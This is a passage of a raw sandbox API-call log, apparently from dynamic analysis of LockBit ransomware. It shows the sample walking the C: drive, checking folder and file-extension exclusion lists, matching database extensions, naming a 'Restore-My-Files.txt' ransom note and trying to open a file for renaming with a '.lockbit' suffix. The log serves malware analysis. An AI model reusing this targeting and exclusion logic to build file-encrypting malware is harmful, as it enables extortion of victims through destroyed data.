-1 [0076.606] lstrcmpiW (lpString1="Config.Msi", lpString2="perflogs") returned -1 [0076.606] lstrcmpiW (lpString1="Config.Msi", lpString2="google") returned -1 [0076.606] lstrcmpiW (lpString1="Config.Msi", lpString2="application data") returned 1 [0076.606] lstrcmpiW (lpString1="Config.Msi", lpString2="windows") returned -1 [0076.606] lstrcmpiW (lpString1="Config.Msi", lpString2="windows.old") returned -1 [0076.606] lstrcmpiW (lpString1="Config.Msi", lpString2="appdata") returned 1 [0076.606] lstrcmpiW (lpString1="Config.Msi", lpString2="Windows nt") returned -1 [0076.606] lstrcmpiW (lpString1="Config.Msi", lpString2="Msbuild") returned -1 [0076.606] lstrcmpiW (lpString1="Config.Msi", lpString2="Microsoft") returned -1 [0076.606] lstrcmpiW (lpString1="Config.Msi", lpString2="All users") returned 1 [0076.606] lstrcmpiW (lpString1="Config.Msi", lpString2="mozilla") returned -1 [0076.606] lstrcmpiW (lpString1="Config.Msi", lpString2="Microsoft.NET") returned -1 [0076.606] lstrcmpiW (lpString1="Config.Msi", lpString2="microsoft shared") returned -1 [0076.606] lstrcmpiW (lpString1="Config.Msi", lpString2="Internet Explorer") returned -1 [0076.606] lstrcmpiW (lpString1="Config.Msi", lpString2="common files") returned 1 [0076.607] lstrcmpiW (lpString1="Config.Msi", lpString2="opera") returned -1 [0076.607] lstrcmpiW (lpString1="Config.Msi", lpString2="Windows Journal") returned -1 [0076.607] wsprintfW (in: param_1=0x3d6e9c8, param_2="%s\\%s" | out: param_1="C:\\\\Config.Msi") returned 14 [0076.607] wsprintfW (in: param_1=0x3d6dda0, param_2="%s\\*" | out: param_1="C:\\\\Config.Msi\\*") returned 16 [0076.607] FindFirstFileExW (in: lpFileName="C:\\\\Config.Msi\\*", fInfoLevelId=0x0, lpFindFileData=0x3d6e1c0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x3d6e1c0) returned 0x55fd78 [0076.607] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0076.607] FindNextFileW (in: hFindFile=0x55fd78, lpFindFileData=0x3d6e1c0 | out: lpFindFileData=0x3d6e1c0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f0072, dwReserved1=0x720067, cFileName="..", cAlternateFileName="")) returned 1 [0076.607] lstrcmpiW (lpString1=".", lpString2="..") returned -1 [0076.607] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0076.607] FindNextFileW (in: hFindFile=0x55fd78, lpFindFileData=0x3d6e1c0 | out: lpFindFileData=0x3d6e1c0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f0072, dwReserved1=0x720067, cFileName="..", cAlternateFileName="")) returned 0 [0076.608] FindClose (in: hFindFile=0x55fd78 | out: hFindFile=0x55fd78) returned 1 [0076.608] FindNextFileW (in: hFindFile=0x55fd38, lpFindFileData=0x3d6ede8 | out: lpFindFileData=0x3d6ede8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x76c29c48, cFileName="Documents and Settings", cAlternateFileName="DOCUME~1")) returned 1 [0076.608] lstrcmpiW (lpString1=".", lpString2="Documents and Settings") returned -1 [0076.608] lstrcmpiW (lpString1="..", lpString2="Documents and Settings") returned -1 [0076.608] lstrcmpiW (lpString1="Documents and Settings", lpString2="$windows.~bt") returned 1 [0076.608] lstrcmpiW (lpString1="Documents and Settings", lpString2="intel") returned -1 [0076.608] lstrcmpiW (lpString1="Documents and Settings", lpString2="msocache") returned -1 [0076.608] lstrcmpiW (lpString1="Documents and Settings", lpString2="$recycle.bin") returned 1 [0076.608] lstrcmpiW (lpString1="Documents and Settings", lpString2="$windows.~ws") returned 1 [0076.608] lstrcmpiW (lpString1="Documents and Settings", lpString2="tor browser") returned -1 [0076.608] lstrcmpiW (lpString1="Documents and Settings", lpString2="boot") returned 1 [0076.608] lstrcmpiW (lpString1="Documents and Settings", lpString2="system volume information") returned -1 [0076.608] lstrcmpiW (lpString1="Documents and Settings", lpString2="perflogs") returned -1 [0076.608] lstrcmpiW (lpString1="Documents and Settings", lpString2="google") returned -1 [0076.608] lstrcmpiW (lpString1="Documents and Settings", lpString2="application data") returned 1 [0076.608] lstrcmpiW (lpString1="Documents and Settings", lpString2="windows") returned -1 [0076.608] lstrcmpiW (lpString1="Documents and Settings", lpString2="windows.old") returned -1 [0076.608] lstrcmpiW (lpString1="Documents and Settings", lpString2="appdata") returned 1 [0076.608] lstrcmpiW (lpString1="Documents and Settings", lpString2="Windows nt") returned -1 [0076.608] lstrcmpiW (lpString1="Documents and Settings", lpString2="Msbuild") returned -1 [0076.608] lstrcmpiW (lpString1="Documents and Settings", lpString2="Microsoft") returned -1 [0076.608] lstrcmpiW (lpString1="Documents and Settings", lpString2="All users") returned 1 [0076.608] lstrcmpiW (lpString1="Documents and Settings", lpString2="mozilla") returned -1 [0076.608] lstrcmpiW (lpString1="Documents and Settings", lpString2="Microsoft.NET") returned -1 [0076.608] lstrcmpiW (lpString1="Documents and Settings", lpString2="microsoft shared") returned -1 [0076.609] lstrcmpiW (lpString1="Documents and Settings", lpString2="Internet Explorer") returned -1 [0076.609] lstrcmpiW (lpString1="Documents and Settings", lpString2="common files") returned 1 [0076.609] lstrcmpiW (lpString1="Documents and Settings", lpString2="opera") returned -1 [0076.609] lstrcmpiW (lpString1="Documents and Settings", lpString2="Windows Journal") returned -1 [0076.609] wsprintfW (in: param_1=0x3d6e9c8, param_2="%s\\%s" | out: param_1="C:\\\\Documents and Settings") returned 26 [0076.609] wsprintfW (in: param_1=0x3d6dda0, param_2="%s\\*" | out: param_1="C:\\\\Documents and Settings\\*") returned 28 [0076.609] FindFirstFileExW (in: lpFileName="C:\\\\Documents and Settings\\*", fInfoLevelId=0x0, lpFindFileData=0x3d6e1c0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x3d6e1c0) returned 0xffffffff [0076.610] FindNextFileW (in: hFindFile=0x55fd38, lpFindFileData=0x3d6ede8 | out: lpFindFileData=0x3d6ede8*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x56257dc0, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x56257dc0, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0xae99ef60, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x5ff9d000, dwReserved0=0xa0000003, dwReserved1=0x76c29c48, cFileName="hiberfil.sys", cAlternateFileName="")) returned 1 [0076.610] lstrcmpiW (lpString1=".", lpString2="hiberfil.sys") returned -1 [0076.610] lstrcmpiW (lpString1="..", lpString2="hiberfil.sys") returned -1 [0076.610] PathFindExtensionW (pszPath="hiberfil.sys") returned=".sys" [0076.610] lstrcmpiW (lpString1=".386", lpString2=".sys") returned -1 [0076.610] lstrcmpiW (lpString1=".cmd", lpString2=".sys") returned -1 [0076.610] lstrcmpiW (lpString1=".exe", lpString2=".sys") returned -1 [0076.610] lstrcmpiW (lpString1=".ani", lpString2=".sys") returned -1 [0076.610] lstrcmpiW (lpString1=".adv", lpString2=".sys") returned -1 [0076.610] lstrcmpiW (lpString1=".theme", lpString2=".sys") returned 1 [0076.610] lstrcmpiW (lpString1=".msi", lpString2=".sys") returned -1 [0076.610] lstrcmpiW (lpString1=".msp", lpString2=".sys") returned -1 [0076.610] lstrcmpiW (lpString1=".com", lpString2=".sys") returned -1 [0076.610] lstrcmpiW (lpString1=".diagpkg", lpString2=".sys") returned -1 [0076.610] lstrcmpiW (lpString1=".nls", lpString2=".sys") returned -1 [0076.610] lstrcmpiW (lpString1=".diagcab", lpString2=".sys") returned -1 [0076.610] lstrcmpiW (lpString1=".lock", lpString2=".sys") returned -1 [0076.610] lstrcmpiW (lpString1=".ocx", lpString2=".sys") returned -1 [0076.610] lstrcmpiW (lpString1=".mpa", lpString2=".sys") returned -1 [0076.610] lstrcmpiW (lpString1=".cpl", lpString2=".sys") returned -1 [0076.610] lstrcmpiW (lpString1=".mod", lpString2=".sys") returned -1 [0076.610] lstrcmpiW (lpString1=".hta", lpString2=".sys") returned -1 [0076.610] lstrcmpiW (lpString1=".icns", lpString2=".sys") returned -1 [0076.610] lstrcmpiW (lpString1=".prf", lpString2=".sys") returned -1 [0076.611] lstrcmpiW (lpString1=".rtp", lpString2=".sys") returned -1 [0076.611] lstrcmpiW (lpString1=".diagcfg", lpString2=".sys") returned -1 [0076.611] lstrcmpiW (lpString1=".msstyles", lpString2=".sys") returned -1 [0076.611] lstrcmpiW (lpString1=".bin", lpString2=".sys") returned -1 [0076.611] lstrcmpiW (lpString1=".hlp", lpString2=".sys") returned -1 [0076.611] lstrcmpiW (lpString1=".shs", lpString2=".sys") returned -1 [0076.611] lstrcmpiW (lpString1=".drv", lpString2=".sys") returned -1 [0076.611] lstrcmpiW (lpString1=".wpx", lpString2=".sys") returned 1 [0076.611] lstrcmpiW (lpString1=".bat", lpString2=".sys") returned -1 [0076.611] lstrcmpiW (lpString1=".rom", lpString2=".sys") returned -1 [0076.611] lstrcmpiW (lpString1=".msc", lpString2=".sys") returned -1 [0076.611] lstrcmpiW (lpString1=".spl", lpString2=".sys") returned -1 [0076.611] lstrcmpiW (lpString1=".ps1", lpString2=".sys") returned -1 [0076.611] lstrcmpiW (lpString1=".msu", lpString2=".sys") returned -1 [0076.611] lstrcmpiW (lpString1=".ics", lpString2=".sys") returned -1 [0076.611] lstrcmpiW (lpString1=".key", lpString2=".sys") returned -1 [0076.611] lstrcmpiW (lpString1=".mp3", lpString2=".sys") returned -1 [0076.611] lstrcmpiW (lpString1=".reg", lpString2=".sys") returned -1 [0076.611] lstrcmpiW (lpString1=".dll", lpString2=".sys") returned -1 [0076.611] lstrcmpiW (lpString1=".ini", lpString2=".sys") returned -1 [0076.611] lstrcmpiW (lpString1=".idx", lpString2=".sys") returned -1 [0076.611] lstrcmpiW (lpString1=".sys", lpString2=".sys") returned 0 [0076.611] FindNextFileW (in: hFindFile=0x55fd38, lpFindFileData=0x3d6ede8 | out: lpFindFileData=0x3d6ede8*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe7b42810, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe7b42810, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x76c29c48, cFileName="MSOCache", cAlternateFileName="")) returned 1 [0076.611] lstrcmpiW (lpString1=".", lpString2="MSOCache") returned -1 [0076.611] lstrcmpiW (lpString1="..", lpString2="MSOCache") returned -1 [0076.611] lstrcmpiW (lpString1="MSOCache", lpString2="$windows.~bt") returned 1 [0076.612] lstrcmpiW (lpString1="MSOCache", lpString2="intel") returned 1 [0076.612] lstrcmpiW (lpString1="MSOCache", lpString2="msocache") returned 0 [0076.612] FindNextFileW (in: hFindFile=0x55fd38, lpFindFileData=0x3d6ede8 | out: lpFindFileData=0x3d6ede8*(dwFileAttributes=0x120, ftCreationTime.dwLowDateTime=0x746a31a0, ftCreationTime.dwHighDateTime=0x1d6047d, ftLastAccessTime.dwLowDateTime=0x746a31a0, ftLastAccessTime.dwHighDateTime=0x1d6047d, ftLastWriteTime.dwLowDateTime=0x746a31a0, ftLastWriteTime.dwHighDateTime=0x1d6047d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x76c29c48, cFileName="oqxrwqwdlodagsb", cAlternateFileName="OQXRWQ~1")) returned 1 [0076.612] lstrcmpiW (lpString1=".", lpString2="oqxrwqwdlodagsb") returned -1 [0076.612] lstrcmpiW (lpString1="..", lpString2="oqxrwqwdlodagsb") returned -1 [0076.612] PathFindExtensionW (pszPath="oqxrwqwdlodagsb") returned="" [0076.612] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="oqxrwqwdlodagsb") returned 1 [0076.612] lstrcmpiW (lpString1="ntldr", lpString2="oqxrwqwdlodagsb") returned -1 [0076.612] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="oqxrwqwdlodagsb") returned -1 [0076.612] lstrcmpiW (lpString1="bootsect.bak", lpString2="oqxrwqwdlodagsb") returned -1 [0076.612] lstrcmpiW (lpString1="autorun.inf", lpString2="oqxrwqwdlodagsb") returned -1 [0076.612] lstrcmpiW (lpString1="thumbs.db", lpString2="oqxrwqwdlodagsb") returned 1 [0076.612] lstrcmpiW (lpString1="iconcache.db", lpString2="oqxrwqwdlodagsb") returned -1 [0076.612] PathAddBackslashW (in: pszPath="C:\\" | out: pszPath="C:\\") returned="" [0076.612] PathFindExtensionW (pszPath="C:\\oqxrwqwdlodagsb") returned="" [0076.612] lstrcmpiW (lpString1=".rar", lpString2="") returned 1 [0076.612] lstrcmpiW (lpString1=".zip", lpString2="") returned 1 [0076.612] lstrcmpiW (lpString1=".7z", lpString2="") returned 1 [0076.612] lstrcmpiW (lpString1=".ckp", lpString2="") returned 1 [0076.612] lstrcmpiW (lpString1=".dacpac", lpString2="") returned 1 [0076.612] lstrcmpiW (lpString1=".db", lpString2="") returned 1 [0076.612] lstrcmpiW (lpString1=".db-shm", lpString2="") returned 1 [0076.612] lstrcmpiW (lpString1=".db-wal", lpString2="") returned 1 [0076.612] lstrcmpiW (lpString1=".db3", lpString2="") returned 1 [0076.612] lstrcmpiW (lpString1=".dbf", lpString2="") returned 1 [0076.612] lstrcmpiW (lpString1=".dbc", lpString2="") returned 1 [0076.613] lstrcmpiW (lpString1=".dbs", lpString2="") returned 1 [0076.613] lstrcmpiW (lpString1=".dbt", lpString2="") returned 1 [0076.613] lstrcmpiW (lpString1=".dbv", lpString2="") returned 1 [0076.613] lstrcmpiW (lpString1=".frm", lpString2="") returned 1 [0076.613] lstrcmpiW (lpString1=".mdf", lpString2="") returned 1 [0076.613] lstrcmpiW (lpString1=".mrg", lpString2="") returned 1 [0076.613] lstrcmpiW (lpString1=".mwb", lpString2="") returned 1 [0076.613] lstrcmpiW (lpString1=".myd", lpString2="") returned 1 [0076.613] lstrcmpiW (lpString1=".ndf", lpString2="") returned 1 [0076.613] lstrcmpiW (lpString1=".qry", lpString2="") returned 1 [0076.613] lstrcmpiW (lpString1=".sdb", lpString2="") returned 1 [0076.613] lstrcmpiW (lpString1=".sdf", lpString2="") returned 1 [0076.613] lstrcmpiW (lpString1=".sql", lpString2="") returned 1 [0076.613] lstrcmpiW (lpString1=".sqlite", lpString2="") returned 1 [0076.613] lstrcmpiW (lpString1=".sqlite3", lpString2="") returned 1 [0076.613] lstrcmpiW (lpString1=".sqlitedb", lpString2="") returned 1 [0076.613] lstrcmpiW (lpString1=".tmd", lpString2="") returned 1 [0076.613] wsprintfW (in: param_1=0x3d6e330, param_2="%s.lockbit" | out: param_1="C:\\oqxrwqwdlodagsb.lockbit") returned 26 [0076.613] CreateFileW (lpFileName="C:\\oqxrwqwdlodagsb" (normalized: "c:\\oqxrwqwdlodagsb"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0076.614] FindNextFileW (in: hFindFile=0x55fd38, lpFindFileData=0x3d6ede8 | out: lpFindFileData=0x3d6ede8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x563d4b80, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x563d4b80, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0xaece4da0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x7ff7c000, dwReserved0=0xa0000003, dwReserved1=0x76c29c48, cFileName="pagefile.sys", cAlternateFileName="")) returned 1 [0076.614] lstrcmpiW (lpString1=".", lpString2="pagefile.sys") returned -1 [0076.614] lstrcmpiW (lpString1="..", lpString2="pagefile.sys") returned -1 [0076.614] PathFindExtensionW (pszPath="pagefile.sys") returned=".sys" [0076.614] lstrcmpiW (lpString1=".386", lpString2=".sys") returned -1 [0076.614] lstrcmpiW (lpString1=".cmd", lpString2=".sys") returned -1 [0076.614] lstrcmpiW (lpString1=".exe", lpString2=".sys") returned -1 [0076.614] lstrcmpiW (lpString1=".ani", lpString2=".sys") returned -1 [0076.614] lstrcmpiW (lpString1=".adv", lpString2=".sys") returned -1 [0076.614] lstrcmpiW (lpString1=".theme", lpString2=".sys") returned 1 [0076.614] lstrcmpiW (lpString1=".msi", lpString2=".sys") returned -1 [0076.614] lstrcmpiW (lpString1=".msp", lpString2=".sys") returned -1 [0076.614] lstrcmpiW (lpString1=".com", lpString2=".sys") returned -1 [0076.614] lstrcmpiW (lpString1=".diagpkg", lpString2=".sys") returned -1 [0076.614] lstrcmpiW (lpString1=".nls", lpString2=".sys") returned -1 [0076.614] lstrcmpiW (lpString1=".diagcab", lpString2=".sys") returned -1 [0076.614] lstrcmpiW (lpString1=".lock", lpString2=".sys") returned -1 [0076.614] lstrcmpiW (lpString1=".ocx", lpString2=".sys") returned -1 [0076.614] lstrcmpiW (lpString1=".mpa", lpString2=".sys") returned -1 [0076.614] lstrcmpiW (lpString1=".cpl", lpString2=".sys") returned -1 [0076.614] lstrcmpiW (lpString1=".mod", lpString2=".sys") returned -1 [0076.614] lstrcmpiW (lpString1=".hta", lpString2=".sys") returned -1 [0076.614] lstrcmpiW (lpString1=".icns", lpString2=".sys") returned -1 [0076.615] lstrcmpiW (lpString1=".prf", lpString2=".sys") returned -1 [0076.615] lstrcmpiW (lpString1=".rtp", lpString2=".sys") returned -1 [0076.615] lstrcmpiW (lpString1=".diagcfg", lpString2=".sys") returned -1 [0076.615] lstrcmpiW (lpString1=".msstyles", lpString2=".sys") returned -1 [0076.615] lstrcmpiW (lpString1=".bin", lpString2=".sys") returned -1 [0076.615] lstrcmpiW (lpString1=".hlp", lpString2=".sys") returned -1 [0076.615] lstrcmpiW (lpString1=".shs", lpString2=".sys") returned -1 [0076.615] lstrcmpiW (lpString1=".drv", lpString2=".sys") returned -1 [0076.615] lstrcmpiW (lpString1=".wpx", lpString2=".sys") returned 1 [0076.615] lstrcmpiW (lpString1=".bat", lpString2=".sys") returned -1 [0076.615] lstrcmpiW (lpString1=".rom", lpString2=".sys") returned -1 [0076.615] lstrcmpiW (lpString1=".msc", lpString2=".sys") returned -1 [0076.615] lstrcmpiW (lpString1=".spl", lpString2=".sys") returned -1 [0076.615] lstrcmpiW (lpString1=".ps1", lpString2=".sys") returned -1 [0076.615] lstrcmpiW (lpString1=".msu", lpString2=".sys") returned -1 [0076.615] lstrcmpiW (lpString1=".ics", lpString2=".sys") returned -1 [0076.615] lstrcmpiW (lpString1=".key", lpString2=".sys") returned -1 [0076.615] lstrcmpiW (lpString1=".mp3", lpString2=".sys") returned -1 [0076.615] lstrcmpiW (lpString1=".reg", lpString2=".sys") returned -1 [0076.615] lstrcmpiW (lpString1=".dll", lpString2=".sys") returned -1 [0076.615] lstrcmpiW (lpString1=".ini", lpString2=".sys") returned -1 [0076.615] lstrcmpiW (lpString1=".idx", lpString2=".sys") returned -1 [0076.615] lstrcmpiW (lpString1=".sys", lpString2=".sys") returned 0 [0076.615] FindNextFileW (in: hFindFile=0x55fd38, lpFindFileData=0x3d6ede8 | out: lpFindFileData=0x3d6ede8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd72e458, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x76c29c48, cFileName="PerfLogs", cAlternateFileName="")) returned 1 [0076.615] lstrcmpiW (lpString1=".", lpString2="PerfLogs") returned -1 [0076.615] lstrcmpiW (lpString1="..", lpString2="PerfLogs") returned -1 [0076.616] lstrcmpiW (lpString1="PerfLogs", lpString2="$windows.~bt") returned 1 [0076.616] lstrcmpiW (lpString1="PerfLogs", lpString2="intel") returned 1 [0076.616] lstrcmpiW (lpString1="PerfLogs", lpString2="msocache") returned 1 [0076.616] lstrcmpiW (lpString1="PerfLogs", lpString2="$recycle.bin") returned 1 [0076.616] lstrcmpiW (lpString1="PerfLogs", lpString2="$windows.~ws") returned 1 [0076.616] lstrcmpiW (lpString1="PerfLogs", lpString2="tor browser") returned -1 [0076.616] lstrcmpiW (lpString1="PerfLogs", lpString2="boot") returned 1 [0076.616] lstrcmpiW (lpString1="PerfLogs", lpString2="system volume information") returned -1 [0076.616] lstrcmpiW (lpString1="PerfLogs", lpString2="perflogs") returned 0 [0076.616] FindNextFileW (in: hFindFile=0x55fd38, lpFindFileData=0x3d6ede8 | out: lpFindFileData=0x3d6ede8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xe83bf6a0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe83bf6a0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x76c29c48, cFileName="Program Files", cAlternateFileName="PROGRA~1")) returned 1 [0076.616] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0076.616] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0076.616] lstrcmpiW (lpString1="Program Files", lpString2="$windows.~bt") returned 1 [0076.616] lstrcmpiW (lpString1="Program Files", lpString2="intel") returned 1 [0076.616] lstrcmpiW (lpString1="Program Files", lpString2="msocache") returned 1 [0076.616] lstrcmpiW (lpString1="Program Files", lpString2="$recycle.bin") returned 1 [0076.616] lstrcmpiW (lpString1="Program Files", lpString2="$windows.~ws") returned 1 [0076.616] lstrcmpiW (lpString1="Program Files", lpString2="tor browser") returned -1 [0076.616] lstrcmpiW (lpString1="Program Files", lpString2="boot") returned 1 [0076.616] lstrcmpiW (lpString1="Program Files", lpString2="system volume information") returned -1 [0076.616] lstrcmpiW (lpString1="Program Files", lpString2="perflogs") returned 1 [0076.616] lstrcmpiW (lpString1="Program Files", lpString2="google") returned 1 [0076.616] lstrcmpiW (lpString1="Program Files", lpString2="application data") returned 1 [0076.616] lstrcmpiW (lpString1="Program Files", lpString2="windows") returned -1 [0076.616] lstrcmpiW (lpString1="Program Files", lpString2="windows.old") returned -1 [0076.616] lstrcmpiW (lpString1="Program Files", lpString2="appdata") returned 1 [0076.617] lstrcmpiW (lpString1="Program Files", lpString2="Windows nt") returned -1 [0076.617] lstrcmpiW (lpString1="Program Files", lpString2="Msbuild") returned 1 [0076.617] lstrcmpiW (lpString1="Program Files", lpString2="Microsoft") returned 1 [0076.617] lstrcmpiW (lpString1="Program Files", lpString2="All users") returned 1 [0076.617] lstrcmpiW (lpString1="Program Files", lpString2="mozilla") returned 1 [0076.617] lstrcmpiW (lpString1="Program Files", lpString2="Microsoft.NET") returned 1 [0076.617] lstrcmpiW (lpString1="Program Files", lpString2="microsoft shared") returned 1 [0076.617] lstrcmpiW (lpString1="Program Files", lpString2="Internet Explorer") returned 1 [0076.617] lstrcmpiW (lpString1="Program Files", lpString2="common files") returned 1 [0076.617] lstrcmpiW (lpString1="Program Files", lpString2="opera") returned 1 [0076.617] lstrcmpiW (lpString1="Program Files", lpString2="Windows Journal") returned -1 [0076.617] wsprintfW (in: param_1=0x3d6e9c8, param_2="%s\\%s" | out: param_1="C:\\\\Program Files") returned 17 [0076.617] wsprintfW (in: param_1=0x3d6dda0, param_2="%s\\*" | out: param_1="C:\\\\Program Files\\*") returned 19 [0076.617] FindFirstFileExW (in: lpFileName="C:\\\\Program Files\\*", fInfoLevelId=0x0, lpFindFileData=0x3d6e1c0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x3d6e1c0) returned 0x55fd78 [0076.617] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0076.617] FindNextFileW (in: hFindFile=0x55fd78, lpFindFileData=0x3d6e1c0 | out: lpFindFileData=0x3d6e1c0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xe83bf6a0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe83bf6a0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x520150, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0076.617] lstrcmpiW (lpString1=".", lpString2="..") returned -1 [0076.617] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0076.618] FindNextFileW (in: hFindFile=0x55fd78, lpFindFileData=0x3d6e1c0 | out: lpFindFileData=0x3d6e1c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xdcc03480, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdcc03480, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x520150, dwReserved1=0x0, cFileName="Common Files", cAlternateFileName="COMMON~1")) returned 1 [0076.639] lstrcmpiW (lpString1=".", lpString2="Common Files") returned -1 [0076.639] lstrcmpiW (lpString1="..", lpString2="Common Files") returned -1 [0076.639] lstrcmpiW (lpString1="Common Files", lpString2="$windows.~bt") returned 1 [0076.639] lstrcmpiW (lpString1="Common Files", lpString2="intel") returned -1 [0076.639] lstrcmpiW (lpString1="Common Files", lpString2="msocache") returned -1 [0076.639] lstrcmpiW (lpString1="Common Files", lpString2="$recycle.bin") returned 1 [0076.639] lstrcmpiW (lpString1="Common Files", lpString2="$windows.~ws") returned 1 [0076.639] lstrcmpiW (lpString1="Common Files", lpString2="tor browser") returned -1 [0076.639] lstrcmpiW (lpString1="Common Files", lpString2="boot") returned 1 [0076.639] lstrcmpiW (lpString1="Common Files", lpString2="system volume information") returned -1 [0076.639] lstrcmpiW (lpString1="Common Files", lpString2="perflogs") returned -1 [0076.639] lstrcmpiW (lpString1="Common Files", lpString2="google") returned -1 [0076.639] lstrcmpiW (lpString1="Common Files", lpString2="application data") returned 1 [0076.639] lstrcmpiW (lpString1="Common Files", lpString2="windows") returned -1 [0076.639] lstrcmpiW (lpString1="Common Files", lpString2="windows.old") returned -1 [0076.639] lstrcmpiW (lpString1="Common Files", lpString2="appdata") returned 1 [0076.639] lstrcmpiW (lpString1="Common Files", lpString2="Windows nt") returned -1 [0076.639] lstrcmpiW (lpString1="Common Files", lpString2="Msbuild") returned -1 [0076.639] lstrcmpiW (lpString1="Common Files", lpString2="Microsoft") returned -1 [0076.639] lstrcmpiW (lpString1="Common Files", lpString2="All users") returned 1 [0076.639] lstrcmpiW (lpString1="Common Files", lpString2="mozilla") returned -1 [0076.639] lstrcmpiW (lpString1="Common Files", lpString2="Microsoft.NET") returned -1 [0076.640] lstrcmpiW (lpString1="Common Files", lpString2="microsoft shared") returned -1 [0076.640] lstrcmpiW (lpString1="Common Files", lpString2="Internet Explorer") returned -1 [0076.640] lstrcmpiW (lpString1="Common Files", lpString2="common files") returned 0 [0076.640] FindNextFileW (in: hFindFile=0x55fd78, lpFindFileData=0x3d6e1c0 | out: lpFindFileData=0x3d6e1c0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28ae853d, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x28ae853d, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28ae853d, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x520150, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0076.640] lstrcmpiW (lpString1=".", lpString2="desktop.ini") returned -1 [0076.640] lstrcmpiW (lpString1="..", lpString2="desktop.ini") returned -1 [0076.640] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0076.640] lstrcmpiW (lpString1=".386", 